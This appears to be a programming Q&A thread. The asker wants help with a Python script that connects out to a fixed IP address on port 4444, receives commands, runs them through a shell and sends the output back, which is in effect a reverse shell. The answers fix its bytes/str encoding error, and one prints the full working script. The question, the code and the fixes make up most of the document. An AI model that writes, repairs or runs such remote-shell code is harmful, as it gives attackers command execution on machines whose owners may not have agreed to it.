# raise TypeError('bytes args is not allowed on Windows')

Tags: python, python-3.x, window

I'm trying to use `windows` system commands with a remote pc on `python3` and it doesn´t seem to work.
When I try to type "dir" to list the commands from my remote pc it gives me an exception on my windows terminal.

```
raise TypeError('bytes args is not allowed on Windows')
```

I know I need to convert it in bytes, I guess? But how do I do that with a variable?

```
import socket
import subprocess

def execute_system_command(command):
    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("192.168.178.87", 4444))

connection.send(b"\n[+] Connection established.\n")

command = connection.recv(1024)
command_result = execute_system_command(command)
connection.send(b(command_result))

connection.close()
```

Comment: What stoping you to use without `b` tag? i.e
`connection.send("\n[+] Connection established.\n")`

Answer (score 0):

Try encoding then decoding the command:

```
output = "\n[+]Connection established\n"

connection.sendall(output.encode('utf-8'))
```

then:

```
command_result = execute_system_command(command.decode('utf-8'))
connection.send(command_result)
```

Answer (score 0):

```
import socket
import subprocess

def execute_system_command(command):
    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("192.168.178.87", 4444))

connection.send(b"\n[+] Connection established.\n")

command = connection.recv(1024)
command = command.decode()
command_result = execute_system_command(command)
connection.send(command_result)

connection.close()
```

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Comment: [A code-only answer is not high quality](https://meta.stackoverflow.com/questions/392712/explaining-entirely-code-based-answers). While this code may be useful, you can improve it by saying why it works, how it works, when it should be used, and what its limitations are. Please [edit] your answer to include explanation and link to relevant documentation.